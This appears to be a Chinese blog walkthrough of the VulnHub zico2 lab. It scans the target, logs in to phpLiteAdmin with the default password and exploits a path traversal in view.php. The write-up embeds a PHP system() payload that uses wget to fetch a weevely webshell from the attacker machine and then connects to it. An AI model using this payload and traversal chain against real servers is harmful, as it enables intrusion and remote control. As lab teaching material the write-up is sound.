综合实战第一章-路径遍历实战


综合实战第一章

路径遍历实战

环境准备

本次环境使用的是vulnhub靶场里面的zico2

靶场下载地址:https ://download.vulnhub.com/zico/zico2.ova

靶机:192.168.3.156

攻击机:kali 192.168.3.134

信息搜集

还是熟悉的信息搜集

nmap -sT 192.168.3.0/24

image-20220424194143317

详细点

nmap -p- -A 192.168.3.156

image-20220424194310135

既然80开了,那就访问看看

image-20220424194417503

好像是个博客?用nikto扫一下

nikto -h http://192.168.3.156

image-20220424194715685

再用dirb扫一下

dirb http://192.168.3.156

image-20220424194757104

打眼一看,有个dbadmin,进去看看

image-20220424194919030

有个test_db.php,再点进去

image-20220424194953275

一个登录窗口,我们再看看有没有啥别的玩意,找了确实啥也没有

搜索了一下phpliteadmin的默认密码,是admin,尝试登录

image-20220424195150526

进去了,先放着

打开owasp zap

OWASP Zed攻击代理(ZAP)是世界上最受欢迎的免费安全审计工具之一,
由数百名国际志愿者*积极维护。
它可以帮助您在开发和测试应用程序时自动查找Web应用程序中的安全漏洞。

image-20220424201006273

image-20220424201039942

image-20220424201215029

然后把他扔到浏览器里,发现了好东西

image-20220424201310663

发现这是个目录遍历漏洞

image-20220424201408309

构造webshell

在网页里新建一个shell.php

image-20220424201548792

新建一个表

image-20220424201630483

在表里插入一个列

image-20220424201716932

然后在列里插入数据

使用weevely新建木马

weevely generate 123456 /root/shell.php

利用webshell

构造字段参数

<?php system("cd /tmp;wget http://192.168.3.134:8000/shell.php;chmod + x shell.php;");?>

插入

image-20220424203010821

再回到kali命令行

python -m SimpleHTTPServer

image-20220424203118103

192.168.3.156/view.php?page=../../../../usr/databases/shell.php

访问这个

下载shell

image-20220424203555635

然后浏览器访问http://192.168.3.156/view.php?page=../../../../tmp/shell.php

在命令行里输入

weevely http://192.168.3.156/view.php?page=../../../../tmp/shell.php 123456

image-20220424203837608

成了


文章作者: Broken-year
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Broken-year !
  目录